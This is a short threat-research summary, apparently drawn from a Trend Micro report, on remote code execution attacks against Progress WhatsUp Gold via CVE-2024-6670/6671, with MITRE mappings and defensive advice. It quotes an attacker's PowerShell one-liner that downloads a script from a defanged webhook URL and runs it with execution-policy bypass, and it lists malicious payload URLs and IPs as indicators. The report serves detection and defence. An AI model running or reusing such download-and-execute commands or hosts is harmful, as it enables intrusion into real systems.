Threat Research

Mitigating RCE Attacks Exploiting WhatsUp Gold Vulnerabilities

TrendMicro

Trend Micro MXDR analyzed remote code execution attacks on Progress WhatsUp Gold abusing CVE-2024-6670/6671, with NmPoller.exe invoking PowerShell scripts to download and run remote access tools. Even though patches were available, some organizations delayed applying them, leading to incidents shortly after a PoC was published; mitigation emphasizes immediate patching, access controls, and monitoring suspicious process activity.

Keypoints

  • Remote code execution attacks on WhatsUp Gold identified since August 30.
  • Exploited vulnerabilities CVE-2024-6670 and CVE-2024-6671, patched on August 16; PoC published August 30.
  • Attacks leveraged the Active Monitor PowerShell Script function.
  • Threat actors used NmPoller.exe to execute malicious PowerShell scripts.
  • Multiple remote access tools were attempted to be installed.
  • Mitigation includes applying patches, tightening access controls, and monitoring suspicious activities.
  • Patch management is crucial, especially for high-severity vulnerabilities.

MITRE Techniques

  • [T1059.001] PowerShell – Execution of PowerShell scripts via NmPoller.exe. Quote: “Multiple PowerShell scripts were executed via NmPoller.exe.”
  • [T1218.005] Signed Binary Proxy Execution: Msiexec – Used msiexec to install remote access tools. Quote: “They attempted to install these four remote access tools (RATs) via msiexec.exe.”
  • [T1060] Registry Run Keys / Startup Folder – Persistence through installed remote administration tools. Quote: “Installed remote administration tools for persistence.”
  • [T1059.003] Windows Command Shell – Commands executed through PowerShell and msiexec. Quote: “Executed commands through PowerShell and msiexec.”
  • [T1105] Ingress Tool Transfer – Downloading malicious payloads from remote URLs (e.g., DownloadFile and iwr usage). Quote: “(New-Object System.Net.WebClient).DownloadFile(‘hxxps://webhook[.]site/b6ef7410-9ec8-44f7-8cdf-7890c1cf5837′,’c:programdataa.ps1’); powershell -exec bypass -file c:programdataa.ps1”

Indicators of Compromise

  • [File path] Suspicious files used by NmPoller.exe – C:ProgramDataa.ps1, c:windowstempMSsetup.msi, C:ProgramDataftpd32.exe
  • [SHA256] File hashes for suspicious files – 6daa94a36c8ccb9442f40c81a18b8501aa360559865f211d72a74788a1bbf3ce, f1c68574167eaea826a90595710e7ee1a1e75c95433883ce569a144f116e2bf4, 992974377793c2479065358b358bb3788078970dacc7c50b495061ccc4507b90
  • [URL] Remote hosts serving malicious payloads – hxxps://webhook[.]site/b6ef7410-9ec8-44f7-8cdf-7890c1cf5837, hxxps://fedko[.]org/wp-includes/ID3/setup.msi
  • [IP/Domain] External network indicators – hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi, hxxp://185.123.100[.]160/access/Remote Access-windows64-offline.exe

Read more: https://www.trendmicro.com/en_us/research/24/i/whatsup-gold-rce.html